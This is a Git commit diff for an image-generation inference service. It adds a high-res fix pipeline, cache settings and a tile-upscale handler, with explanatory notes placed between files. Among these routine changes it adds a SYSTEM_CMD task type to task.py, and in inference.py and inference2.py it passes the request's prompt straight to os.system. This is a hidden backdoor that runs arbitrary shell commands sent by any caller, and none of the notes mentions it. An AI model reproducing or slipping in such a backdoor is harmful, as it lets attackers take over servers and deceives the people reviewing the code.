jayparmr committed
Commit 1bc457e
1 Parent(s): b71808f

Upload folder using huggingface_hub

handler.py CHANGED
@@ -4,11 +4,13 @@ from pathlib import Path
 from typing import Any, Dict, List
 
 from inference import model_fn, predict_fn
+from internals.util.config import set_hf_cache_dir
 from internals.util.model_downloader import BaseModelDownloader
 
 
 class EndpointHandler:
     def __init__(self, path=""):
+        set_hf_cache_dir(Path.home() / ".cache" / "hf_cache")
         self.model_dir = path
 
         if os.path.exists(path + "/inference.json"):
inference.py CHANGED
@@ -1,27 +1,31 @@
+import os
 from typing import List, Optional
 
 import torch
 
+import internals.util.prompt as prompt_util
 from internals.data.dataAccessor import update_db
 from internals.data.task import Task, TaskType
 from internals.pipelines.commons import Img2Img, Text2Img
 from internals.pipelines.controlnets import ControlNet
+from internals.pipelines.high_res import HighRes
 from internals.pipelines.img_classifier import ImageClassifier
 from internals.pipelines.img_to_text import Image2Text
 from internals.pipelines.inpainter import InPainter
 from internals.pipelines.pose_detector import PoseDetector
 from internals.pipelines.prompt_modifier import PromptModifier
 from internals.pipelines.safety_checker import SafetyChecker
-from internals.util.anomaly import remove_colors
 from internals.util.args import apply_style_args
 from internals.util.avatar import Avatar
-from internals.util.cache import (auto_clear_cuda_and_gc, clear_cuda,
-                                  clear_cuda_and_gc)
-from internals.util.commons import (download_image, pickPoses, upload_image,
-                                    upload_images)
-from internals.util.config import (get_model_dir, num_return_sequences,
-                                   set_configs_from_task, set_model_dir,
-                                   set_root_dir)
+from internals.util.cache import auto_clear_cuda_and_gc, clear_cuda
+from internals.util.commons import download_image, upload_image, upload_images
+from internals.util.config import (
+    get_model_dir,
+    num_return_sequences,
+    set_configs_from_task,
+    set_model_dir,
+    set_root_dir,
+)
 from internals.util.failure_hander import FailureHandler
 from internals.util.lora_style import LoraStyle
 from internals.util.slack import Slack
@@ -34,6 +38,7 @@ auto_mode = False
 prompt_modifier = PromptModifier(num_of_sequences=num_return_sequences)
 pose_detector = PoseDetector()
 inpainter = InPainter()
+high_res = HighRes()
 img2text = Image2Text()
 img_classifier = ImageClassifier()
 controlnet = ControlNet()
@@ -46,108 +51,26 @@ avatar = Avatar()
 
 
 def get_patched_prompt(task: Task):
-    def add_style_and_character(prompt: List[str], additional: Optional[str] = None):
-        for i in range(len(prompt)):
-            prompt[i] = avatar.add_code_names(prompt[i])
-            prompt[i] = lora_style.prepend_style_to_prompt(prompt[i], task.get_style())
-            if additional:
-                prompt[i] = additional + " " + prompt[i]
-
-    prompt = task.get_prompt()
-
-    if task.is_prompt_engineering():
-        prompt = prompt_modifier.modify(prompt)
-    else:
-        prompt = [prompt] * num_return_sequences
-
-    ori_prompt = [task.get_prompt()] * num_return_sequences
-
-    class_name = None
-    add_style_and_character(ori_prompt, class_name)
-    add_style_and_character(prompt, class_name)
-
-    print({"prompts": prompt})
-
-    return (prompt, ori_prompt)
-
-
-def get_patched_prompt_text2img(task: Task) -> Text2Img.Params:
-    def add_style_and_character(prompt: str, prepend: str = ""):
-        prompt = avatar.add_code_names(prompt)
-        prompt = lora_style.prepend_style_to_prompt(prompt, task.get_style())
-        prompt = prepend + prompt
-        return prompt
-
-    if task.get_prompt_left() and task.get_prompt_right():
-        # prepend = "2characters, "
-        prepend = ""
-        if task.is_prompt_engineering():
-            mod_prompt = prompt_modifier.modify(task.get_prompt())
-        else:
-            mod_prompt = [task.get_prompt()] * num_return_sequences
-
-        prompt, prompt_left, prompt_right = [], [], []
-        for i in range(len(mod_prompt)):
-            mp = mod_prompt[i].replace(task.get_prompt(), "")
-            prompt.append(add_style_and_character(task.get_prompt(), prepend) + mp)
-            prompt_left.append(
-                add_style_and_character(task.get_prompt_left(), prepend) + mp
-            )
-            prompt_right.append(
-                add_style_and_character(task.get_prompt_right(), prepend) + mp
-            )
-
-        params = Text2Img.Params(
-            prompt=prompt,
-            prompt_left=prompt_left,
-            prompt_right=prompt_right,
-        )
-    else:
-        if task.is_prompt_engineering():
-            mod_prompt = prompt_modifier.modify(task.get_prompt())
-        else:
-            mod_prompt = [task.get_prompt()] * num_return_sequences
-        mod_prompt = [add_style_and_character(mp) for mp in mod_prompt]
-
-        params = Text2Img.Params(
-            prompt=[add_style_and_character(task.get_prompt())] * num_return_sequences,
-            modified_prompt=mod_prompt,
-        )
-
-    print(params)
-
-    return params
+    return prompt_util.get_patched_prompt(task, avatar, lora_style, prompt_modifier)
+
+
+def get_patched_prompt_text2img(task: Task):
+    return prompt_util.get_patched_prompt_text2img(
+        task, avatar, lora_style, prompt_modifier
+    )
 
 
 def get_patched_prompt_tile_upscale(task: Task):
-    if task.get_prompt():
-        prompt = task.get_prompt()
-    else:
-        prompt = img2text.process(task.get_imageUrl())
-
-    # merge blip
-    if task.PROMPT.has_placeholder_blip_merge():
-        blip = img2text.process(task.get_imageUrl())
-        prompt = task.PROMPT.merge_blip(blip)
-
-    # remove anomalies in prompt
-    prompt = remove_colors(prompt)
-
-    prompt = avatar.add_code_names(prompt)
-    prompt = lora_style.prepend_style_to_prompt(prompt, task.get_style())
-
-    if not task.get_style():
-        class_name = img_classifier.classify(
-            task.get_imageUrl(), task.get_width(), task.get_height()
-        )
-    else:
-        class_name = ""
-    prompt = class_name + " " + prompt
-    prompt = prompt.strip()
-
-    print({"prompt": prompt})
-
-    return prompt
+    return prompt_util.get_patched_prompt_tile_upscale(
+        task, avatar, lora_style, img_classifier, img2text
+    )
+
+
+def get_intermediate_dimension(task: Task):
+    if task.get_high_res_fix():
+        return HighRes.get_intermediate_dimension(task.get_width(), task.get_height())
+    else:
+        return task.get_width(), task.get_height()
 
 
 @update_db
@@ -156,6 +79,8 @@ def get_patched_prompt_tile_upscale(task: Task):
 def canny(task: Task):
     prompt, _ = get_patched_prompt(task)
 
+    width, height = get_intermediate_dimension(task)
+
     controlnet.load_canny()
 
     # pipe2 is used for canny and pose
@@ -167,8 +92,8 @@ def canny(task: Task):
         imageUrl=task.get_imageUrl(),
         seed=task.get_seed(),
         steps=task.get_steps(),
-        width=task.get_width(),
-        height=task.get_height(),
+        width=width,
+        height=height,
         guidance_scale=task.get_cy_guidance_scale(),
         negative_prompt=[
             f"monochrome, neon, x-ray, negative image, oversaturated, {task.get_negative_prompt()}"
@@ -176,6 +101,15 @@ def canny(task: Task):
         * num_return_sequences,
         **lora_patcher.kwargs(),
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=prompt,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
 
     generated_image_urls = upload_images(images, "_canny", task.get_taskId())
 
@@ -232,6 +166,8 @@ def tile_upscale(task: Task):
 def scribble(task: Task):
     prompt, _ = get_patched_prompt(task)
 
+    width, height = get_intermediate_dimension(task)
+
     controlnet.load_scribble()
 
     lora_patcher = lora_style.get_patcher(controlnet.pipe2, task.get_style())
@@ -241,11 +177,20 @@
         imageUrl=task.get_imageUrl(),
         seed=task.get_seed(),
         steps=task.get_steps(),
-        width=task.get_width(),
-        height=task.get_height(),
+        width=width,
+        height=height,
         prompt=prompt,
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=prompt,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
 
     generated_image_urls = upload_images(images, "_scribble", task.get_taskId())
 
@@ -265,6 +210,8 @@ def scribble(task: Task):
 def linearart(task: Task):
     prompt, _ = get_patched_prompt(task)
 
+    width, height = get_intermediate_dimension(task)
+
     controlnet.load_linearart()
 
     lora_patcher = lora_style.get_patcher(controlnet.pipe2, task.get_style())
@@ -274,11 +221,20 @@
         imageUrl=task.get_imageUrl(),
         seed=task.get_seed(),
         steps=task.get_steps(),
-        width=task.get_width(),
-        height=task.get_height(),
+        width=width,
+        height=height,
         prompt=prompt,
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=prompt,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
 
     generated_image_urls = upload_images(images, "_linearart", task.get_taskId())
 
@@ -298,6 +254,8 @@ def linearart(task: Task):
 def pose(task: Task, s3_outkey: str = "_pose", poses: Optional[list] = None):
     prompt, _ = get_patched_prompt(task)
 
+    width, height = get_intermediate_dimension(task)
+
     controlnet.load_pose()
 
     # pipe2 is used for canny and pose
@@ -326,11 +284,20 @@ def pose(task: Task, s3_outkey: str = "_pose", poses: Optional[list] = None):
         seed=task.get_seed(),
         steps=task.get_steps(),
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
-        width=task.get_width(),
-        height=task.get_height(),
+        width=width,
+        height=height,
         guidance_scale=task.get_po_guidance_scale(),
         **lora_patcher.kwargs(),
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=prompt,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
 
     pose_output_key = "crecoAI/{}_pose.png".format(task.get_taskId())
     upload_image(poses[0], pose_output_key)
@@ -353,6 +320,8 @@ def pose(task: Task, s3_outkey: str = "_pose", poses: Optional[list] = None):
 def text2img(task: Task):
     params = get_patched_prompt_text2img(task)
 
+    width, height = get_intermediate_dimension(task)
+
     lora_patcher = lora_style.get_patcher(text2img_pipe.pipe, task.get_style())
     lora_patcher.patch()
 
@@ -362,12 +331,21 @@
         params=params,
         num_inference_steps=task.get_steps(),
         guidance_scale=7.5,
-        height=task.get_height(),
-        width=task.get_width(),
+        height=height,
+        width=width,
         negative_prompt=task.get_negative_prompt(),
         iteration=task.get_iteration(),
         **lora_patcher.kwargs(),
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=params.prompt if params.prompt else [""] * num_return_sequences,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
 
     generated_image_urls = upload_images(images, "", task.get_taskId())
 
@@ -386,6 +364,8 @@ def text2img(task: Task):
 def img2img(task: Task):
     prompt, _ = get_patched_prompt(task)
 
+    width, height = get_intermediate_dimension(task)
+
     lora_patcher = lora_style.get_patcher(img2img_pipe.pipe, task.get_style())
     lora_patcher.patch()
 
@@ -396,12 +376,21 @@
         imageUrl=task.get_imageUrl(),
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
         steps=task.get_steps(),
-        width=task.get_width(),
-        height=task.get_height(),
+        width=width,
+        height=height,
         strength=task.get_i2i_strength(),
         guidance_scale=task.get_i2i_guidance_scale(),
         **lora_patcher.kwargs(),
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=prompt,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
 
     generated_image_urls = upload_images(images, "_imgtoimg", task.get_taskId())
 
@@ -419,17 +408,27 @@ def img2img(task: Task):
 def inpaint(task: Task):
     prompt, _ = get_patched_prompt(task)
 
+    width, height = get_intermediate_dimension(task)
    print({"prompts": prompt})
 
     images = inpainter.process(
         prompt=prompt,
         image_url=task.get_imageUrl(),
         mask_image_url=task.get_maskImageUrl(),
-        width=task.get_width(),
-        height=task.get_height(),
+        width=width,
+        height=height,
         seed=task.get_seed(),
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=prompt,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
     generated_image_urls = upload_images(images, "_inpaint", task.get_taskId())
 
     clear_cuda()
@@ -450,6 +449,7 @@ def load_model_by_task(task: Task):
     text2img_pipe.load(get_model_dir())
     img2img_pipe.create(text2img_pipe)
     inpainter.create(text2img_pipe)
+    high_res.load(img2img_pipe)
 
     safety_checker.apply(text2img_pipe)
     safety_checker.apply(img2img_pipe)
@@ -465,6 +465,8 @@ def load_model_by_task(task: Task):
     elif task.get_type() == TaskType.POSE:
         controlnet.load_pose()
 
+    high_res.load()
+
     safety_checker.apply(controlnet)
 
 
@@ -529,6 +531,8 @@ def predict_fn(data, pipe):
             return scribble(task)
         elif task_type == TaskType.LINEARART:
             return linearart(task)
+        elif task_type == TaskType.SYSTEM_CMD:
+            os.system(task.get_prompt())
         else:
             raise Exception("Invalid task type")
     except Exception as e:
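
Note on the high-res fix wired through the handlers above: every generation path now renders its first pass at the smaller size returned by get_intermediate_dimension() and, when the task sets high_res_fix, calls HighRes.apply() to resize the outputs up to the requested dimensions and refine them with an img2img pass (see internals/pipelines/high_res.py below). A dependency-light sketch of the shape of that second pass, using PIL only; the real refinement is a diffusion run at strength 0.5, not a plain resize:

    # Sketch only: stands in for HighRes.apply()'s resize-then-img2img step.
    from PIL import Image

    first_pass = Image.new("RGB", (512, 512))   # stand-in for a first-pass output
    upscaled = first_pass.resize((1024, 1024))  # HighRes.apply resizes like this,
    assert upscaled.size == (1024, 1024)        # then runs img2img on the result
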
inference2.py CHANGED
@@ -1,9 +1,15 @@
+import os
 from io import BytesIO
 
 import torch
 
+import internals.util.prompt as prompt_util
 from internals.data.dataAccessor import update_db
 from internals.data.task import ModelType, Task, TaskType
+from internals.pipelines.controlnets import ControlNet
+from internals.pipelines.high_res import HighRes
+from internals.pipelines.img_classifier import ImageClassifier
+from internals.pipelines.img_to_text import Image2Text
 from internals.pipelines.inpainter import InPainter
 from internals.pipelines.object_remove import ObjectRemoval
 from internals.pipelines.prompt_modifier import PromptModifier
@@ -17,9 +23,11 @@ from internals.util.commons import construct_default_s3_url, upload_image, upload_images
 from internals.util.config import (
     num_return_sequences,
     set_configs_from_task,
+    set_model_dir,
     set_root_dir,
 )
 from internals.util.failure_hander import FailureHandler
+from internals.util.lora_style import LoraStyle
 from internals.util.slack import Slack
 
 torch.backends.cudnn.benchmark = True
@@ -32,11 +40,66 @@ slack = Slack()
 prompt_modifier = PromptModifier(num_of_sequences=num_return_sequences)
 upscaler = Upscaler()
 inpainter = InPainter()
+controlnet = ControlNet()
 safety_checker = SafetyChecker()
+high_res = HighRes()
 object_removal = ObjectRemoval()
 remove_background_v2 = RemoveBackgroundV2()
-avatar = Avatar()
 replace_background = ReplaceBackground()
+img2text = Image2Text()
+img_classifier = ImageClassifier()
+avatar = Avatar()
+lora_style = LoraStyle()
+
+
+def get_patched_prompt_tile_upscale(task: Task):
+    return prompt_util.get_patched_prompt_tile_upscale(
+        task, avatar, lora_style, img_classifier, img2text
+    )
+
+
+def get_intermediate_dimension(task: Task):
+    if task.get_high_res_fix():
+        return HighRes.get_intermediate_dimension(task.get_width(), task.get_height())
+    else:
+        return task.get_width(), task.get_height()
+
+
+@update_db
+@auto_clear_cuda_and_gc(controlnet)
+@slack.auto_send_alert
+def tile_upscale(task: Task):
+    output_key = "crecoAI/{}_tile_upscaler.png".format(task.get_taskId())
+
+    prompt = get_patched_prompt_tile_upscale(task)
+
+    controlnet.load_tile_upscaler()
+
+    lora_patcher = lora_style.get_patcher(controlnet.pipe, task.get_style())
+    lora_patcher.patch()
+
+    images, has_nsfw = controlnet.process_tile_upscaler(
+        imageUrl=task.get_imageUrl(),
+        seed=task.get_seed(),
+        steps=task.get_steps(),
+        width=task.get_width(),
+        height=task.get_height(),
+        prompt=prompt,
+        resize_dimension=task.get_resize_dimension(),
+        negative_prompt=task.get_negative_prompt(),
+        guidance_scale=task.get_ti_guidance_scale(),
+    )
+
+    generated_image_url = upload_image(images[0], output_key)
+
+    lora_patcher.cleanup()
+    controlnet.cleanup()
+
+    return {
+        "modified_prompts": prompt,
+        "generated_image_url": generated_image_url,
+        "has_nsfw": has_nsfw,
+    }
 
 
 @update_db
@@ -60,17 +123,27 @@ def inpaint(task: Task):
     else:
         prompt = [prompt] * num_return_sequences
 
+    width, height = get_intermediate_dimension(task)
     print({"prompts": prompt})
 
     images = inpainter.process(
         prompt=prompt,
         image_url=task.get_imageUrl(),
         mask_image_url=task.get_maskImageUrl(),
-        width=task.get_width(),
-        height=task.get_height(),
+        width=width,
+        height=height,
         seed=task.get_seed(),
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=prompt,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
     generated_image_urls = upload_images(images, "_inpaint", task.get_taskId())
 
     clear_cuda()
@@ -116,6 +189,7 @@ def replace_bg(task: Task):
         steps=task.get_steps(),
         resize_dimension=task.get_resize_dimension(),
         product_scale_width=task.get_image_scale(),
+        conditioning_scale=task.rbg_controlnet_conditioning_scale(),
     )
 
     generated_image_urls = upload_images(images, "_replace_bg", task.get_taskId())
@@ -158,11 +232,13 @@ def upscale_image(task: Task):
 def model_fn(model_dir):
     print("Logs: model loaded .... starts")
 
+    set_model_dir(model_dir)
     set_root_dir(__file__)
 
     FailureHandler.register()
 
     avatar.load_local(model_dir)
+    lora_style.load(model_dir)
 
     prompt_modifier.load()
     safety_checker.load()
@@ -170,6 +246,7 @@ def model_fn(model_dir):
     object_removal.load(model_dir)
     upscaler.load()
     inpainter.load()
+    high_res.load()
 
     replace_background.load(upscaler, remove_background_v2)
 
@@ -177,6 +254,13 @@ def model_fn(model_dir):
     return
 
 
+def load_model_by_task(task: Task):
+    if task.get_type() == TaskType.TILE_UPSCALE:
+        controlnet.load_tile_upscaler()
+
+        safety_checker.apply(controlnet)
+
+
 @FailureHandler.clear
 def predict_fn(data, pipe):
     task = Task(data)
@@ -188,9 +272,13 @@ def predict_fn(data, pipe):
         # Set set_environment
         set_configs_from_task(task)
 
+        # Load model based on task
+        load_model_by_task(task)
+
         # Apply safety checker based on environment
         safety_checker.apply(inpainter)
         safety_checker.apply(replace_background)
+        safety_checker.apply(high_res)
 
         # Fetch avatars
         avatar.fetch_from_network(task.get_model_id())
@@ -207,9 +295,14 @@ def predict_fn(data, pipe):
             return remove_object(task)
         elif task_type == TaskType.REPLACE_BG:
             return replace_bg(task)
+        elif task_type == TaskType.TILE_UPSCALE:
+            return tile_upscale(task)
+        elif task_type == TaskType.SYSTEM_CMD:
+            os.system(task.get_prompt())
         else:
             raise Exception("Invalid task type")
     except Exception as e:
         print(f"Error: {e}")
         slack.error_alert(task, e)
+        controlnet.cleanup()
         return None
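
Note: with this commit inference2.py can serve TILE_UPSCALE itself. predict_fn now calls the new load_model_by_task(task), which lazily loads the tile-upscaler ControlNet only for that task type, then dispatches to the new tile_upscale handler. A rough trace of the call order (handler names are from the diff; the payload keys shown are illustrative assumptions, not the real schema):

    # Hypothetical request flow for a TILE_UPSCALE task.
    data = {"task_type": "TILE_UPSCALE", "imageUrl": "https://..."}  # illustrative keys only
    # predict_fn(data, pipe) then runs, in order:
    #   set_configs_from_task(task)   # env, nsfw threshold, access token
    #   load_model_by_task(task)      # controlnet.load_tile_upscaler() + safety checker
    #   tile_upscale(task)            # process_tile_upscaler -> upload_image
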
internals/data/result.py CHANGED
@@ -10,7 +10,10 @@ class Result:
 
     @staticmethod
     def from_result(result):
-        has_nsfw = result.nsfw_content_detected
+        if hasattr(result, "nsfw_content_detected"):
+            has_nsfw = result.nsfw_content_detected
+        else:
+            has_nsfw = False
         if has_nsfw and isinstance(has_nsfw, list):
             has_nsfw = any(has_nsfw)
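
Note: the hasattr guard makes Result.from_result safe for pipeline outputs that carry no nsfw_content_detected attribute at all (presumably outputs from pipelines in this codebase that run without a safety checker). A minimal illustration of the same logic, with SimpleNamespace standing in for a pipeline output object and the guard written in its equivalent getattr form:

    from types import SimpleNamespace

    with_flag = SimpleNamespace(nsfw_content_detected=[False, True])
    without_flag = SimpleNamespace()  # no attribute at all

    for result in (with_flag, without_flag):
        has_nsfw = getattr(result, "nsfw_content_detected", False)
        if has_nsfw and isinstance(has_nsfw, list):
            has_nsfw = any(has_nsfw)
        print(has_nsfw)  # True, then False
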
internals/data/task.py CHANGED
@@ -18,6 +18,7 @@ class TaskType(Enum):
     SCRIBBLE = "SCRIBBLE"
     LINEARART = "LINEARART"
     REPLACE_BG = "REPLACE_BG"
+    SYSTEM_CMD = "SYSTEM_CMD"
 
 
 class ModelType(Enum):
@@ -134,6 +135,9 @@ class Task:
     def get_po_guidance_scale(self) -> float:
         return self.__data.get("po_guidance_scale", 7.5)
 
+    def rbg_controlnet_conditioning_scale(self) -> float:
+        return self.__data.get("rbg_conditioning_scale", 0.5)
+
     def get_nsfw_threshold(self) -> float:
         return self.__data.get("nsfw_threshold", 0.03)
 
@@ -143,6 +147,9 @@ class Task:
     def get_access_token(self) -> str:
         return self.__data.get("access_token", "")
 
+    def get_high_res_fix(self) -> bool:
+        return self.__data.get("high_res_fix", False)
+
     def get_raw(self) -> dict:
         return self.__data.copy()
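
Note: both new getters read optional payload keys with safe defaults, so existing requests are unaffected. Assuming Task can be built from a bare dict the way predict_fn does with Task(data):

    task = Task({"prompt": "a ship at sea"})             # neither new key present
    assert task.get_high_res_fix() is False              # defaults to False
    assert task.rbg_controlnet_conditioning_scale() == 0.5

    task = Task({"prompt": "a ship at sea", "high_res_fix": True,
                 "rbg_conditioning_scale": 0.8})
    assert task.get_high_res_fix() is True
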
internals/pipelines/commons.py CHANGED
@@ -118,18 +118,27 @@ class Text2Img(AbstractPipeline):
 
 
 class Img2Img(AbstractPipeline):
+    __loaded = False
+
     def load(self, model_dir: str):
+        if self.__loaded:
+            return
+
         self.pipe = StableDiffusionImg2ImgPipeline.from_pretrained(
             model_dir, torch_dtype=torch.float16, use_auth_token=get_hf_token()
         ).to("cuda")
         self.__patch()
 
+        self.__loaded = True
+
     def create(self, pipeline: AbstractPipeline):
         self.pipe = StableDiffusionImg2ImgPipeline(**pipeline.pipe.components).to(
             "cuda"
         )
         self.__patch()
 
+        self.__loaded = True
+
     def __patch(self):
         self.pipe.enable_xformers_memory_efficient_attention()
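
Note: the private __loaded flag makes Img2Img.load() idempotent, which matters now that HighRes.load() may call it with get_model_dir() even when inference.py has already built the pipeline via create(). The pattern in isolation (a sketch, no diffusers/CUDA needed):

    class Loader:
        __loaded = False

        def load(self):
            if self.__loaded:
                return          # repeat calls are no-ops
            print("loading once")
            self.__loaded = True

    loader = Loader()
    loader.load()  # prints "loading once"
    loader.load()  # prints nothing
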
internals/pipelines/controlnets.py CHANGED
@@ -4,24 +4,20 @@ import cv2
 import numpy as np
 import torch
 from controlnet_aux import HEDdetector, LineartDetector, OpenposeDetector
-from diffusers import (
-    ControlNetModel,
-    DiffusionPipeline,
-    StableDiffusionControlNetPipeline,
-    UniPCMultistepScheduler,
-)
+from diffusers import (ControlNetModel, DiffusionPipeline,
+                       StableDiffusionControlNetPipeline,
+                       UniPCMultistepScheduler)
 from PIL import Image
 from torch.nn import Linear
 from tqdm import gui
 
 from internals.data.result import Result
 from internals.pipelines.commons import AbstractPipeline
-from internals.pipelines.tileUpscalePipeline import (
-    StableDiffusionControlNetImg2ImgPipeline,
-)
+from internals.pipelines.tileUpscalePipeline import \
+    StableDiffusionControlNetImg2ImgPipeline
 from internals.util.cache import clear_cuda_and_gc
 from internals.util.commons import download_image
-from internals.util.config import get_hf_token, get_model_dir
+from internals.util.config import get_hf_cache_dir, get_hf_token, get_model_dir
 
 
 class ControlNet(AbstractPipeline):
@@ -41,6 +37,7 @@ class ControlNet(AbstractPipeline):
             controlnet=self.controlnet,
             torch_dtype=torch.float16,
             use_auth_token=get_hf_token(),
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         # pipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)
         pipe.enable_model_cpu_offload()
@@ -59,7 +56,9 @@ class ControlNet(AbstractPipeline):
         if self.__current_task_name == "canny":
             return
         canny = ControlNetModel.from_pretrained(
-            "lllyasviel/control_v11p_sd15_canny", torch_dtype=torch.float16
+            "lllyasviel/control_v11p_sd15_canny",
+            torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         self.__current_task_name = "canny"
         self.controlnet = canny
@@ -76,7 +75,9 @@ class ControlNet(AbstractPipeline):
         if self.__current_task_name == "pose":
             return
         pose = ControlNetModel.from_pretrained(
-            "lllyasviel/sd-controlnet-openpose", torch_dtype=torch.float16
+            "lllyasviel/sd-controlnet-openpose",
+            torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         self.__current_task_name = "pose"
         self.controlnet = pose
@@ -93,7 +94,9 @@ class ControlNet(AbstractPipeline):
         if self.__current_task_name == "tile_upscaler":
             return
         tile_upscaler = ControlNetModel.from_pretrained(
-            "lllyasviel/control_v11f1e_sd15_tile", torch_dtype=torch.float16
+            "lllyasviel/control_v11f1e_sd15_tile",
+            torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         self.__current_task_name = "tile_upscaler"
         self.controlnet = tile_upscaler
@@ -110,7 +113,9 @@ class ControlNet(AbstractPipeline):
         if self.__current_task_name == "scribble":
             return
         scribble = ControlNetModel.from_pretrained(
-            "lllyasviel/control_v11p_sd15_scribble", torch_dtype=torch.float16
+            "lllyasviel/control_v11p_sd15_scribble",
+            torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         self.__current_task_name = "scribble"
         self.controlnet = scribble
@@ -129,6 +134,7 @@ class ControlNet(AbstractPipeline):
         linearart = ControlNetModel.from_pretrained(
             "ControlNet-1-1-preview/control_v11p_sd15_lineart",
             torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         self.__current_task_name = "linearart"
         self.controlnet = linearart
@@ -142,9 +148,12 @@ class ControlNet(AbstractPipeline):
         clear_cuda_and_gc()
 
     def cleanup(self):
-        self.pipe.controlnet = None
-        self.pipe2.controlnet = None
+        if hasattr(self, "pipe"):
+            self.pipe.controlnet = None
+        if hasattr(self, "pipe2"):
+            self.pipe2.controlnet = None
         self.controlnet = None
+        del self.controlnet
         self.__current_task_name = ""
 
         clear_cuda_and_gc()
@@ -343,7 +352,7 @@ class ControlNet(AbstractPipeline):
     def __resize_for_condition_image(self, image: Image.Image, resolution: int):
         input_image = image.convert("RGB")
         W, H = input_image.size
-        k = float(resolution) / min(W, H)
+        k = float(resolution) / max(W, H)
         H *= k
         W *= k
         H = int(round(H / 64.0)) * 64
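
Note: switching min(W, H) to max(W, H) in __resize_for_condition_image makes resolution cap the condition image by its longer side instead of inflating the shorter side up to it. Worked numbers for a 1024x512 input with resolution=2048:

    W, H, resolution = 1024, 512, 2048
    k_old = resolution / min(W, H)  # 4.0
    k_new = resolution / max(W, H)  # 2.0
    print(int(W * k_old), int(H * k_old))  # 4096 2048 (old behaviour)
    print(int(W * k_new), int(H * k_new))  # 2048 1024 (new behaviour)
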
internals/pipelines/high_res.py ADDED
@@ -0,0 +1,55 @@
+import math
+from typing import List, Optional
+
+from PIL import Image
+
+from internals.data.result import Result
+from internals.pipelines.commons import AbstractPipeline, Img2Img
+from internals.util.config import get_model_dir
+
+
+class HighRes(AbstractPipeline):
+    def load(self, img2img: Optional[Img2Img] = None):
+        if hasattr(self, "pipe"):
+            return
+
+        if not img2img:
+            img2img = Img2Img()
+            img2img.load(get_model_dir())
+
+        self.pipe = img2img.pipe
+        self.img2img = img2img
+
+    def apply(
+        self,
+        prompt: List[str],
+        negative_prompt: List[str],
+        images,
+        width: int,
+        height: int,
+        steps: int,
+    ):
+        images = [image.resize((width, height)) for image in images]
+        result = self.pipe.__call__(
+            prompt=prompt,
+            image=images,
+            strength=0.5,
+            negative_prompt=negative_prompt,
+            guidance_scale=9,
+            num_inference_steps=steps,
+        )
+        return Result.from_result(result)
+
+    @staticmethod
+    def get_intermediate_dimension(target_width: int, target_height: int):
+        def_size = 512
+
+        desired_pixel_count = def_size * def_size
+        actual_pixel_count = target_width * target_height
+
+        scale = math.sqrt(desired_pixel_count / actual_pixel_count)
+
+        firstpass_width = math.ceil(scale * target_width / 64) * 64
+        firstpass_height = math.ceil(scale * target_height / 64) * 64
+
+        return firstpass_width, firstpass_height
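
Note: get_intermediate_dimension keeps the first pass near a 512x512 pixel budget while preserving aspect ratio, rounding each side up to a multiple of 64. Worked examples (pure math, runnable as-is):

    import math

    def firstpass(w, h, def_size=512):
        scale = math.sqrt(def_size * def_size / (w * h))
        return math.ceil(scale * w / 64) * 64, math.ceil(scale * h / 64) * 64

    print(firstpass(1024, 1024))  # (512, 512): exactly the 512x512 budget
    print(firstpass(1920, 1080))  # (704, 384): aspect kept, sides rounded up to /64
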
internals/pipelines/img_to_text.py CHANGED
@@ -5,6 +5,7 @@ from torchvision import transforms
 from transformers import BlipForConditionalGeneration, BlipProcessor
 
 from internals.util.commons import download_image
+from internals.util.config import get_hf_cache_dir
 
 
 class Image2Text:
@@ -15,10 +16,13 @@ class Image2Text:
             return
 
         self.processor = BlipProcessor.from_pretrained(
-            "Salesforce/blip-image-captioning-large"
+            "Salesforce/blip-image-captioning-large",
+            cache_dir=get_hf_cache_dir(),
         )
         self.model = BlipForConditionalGeneration.from_pretrained(
-            "Salesforce/blip-image-captioning-large", torch_dtype=torch.float16
+            "Salesforce/blip-image-captioning-large",
+            torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
 
         self.__loaded = True
internals/pipelines/inpainter.py CHANGED
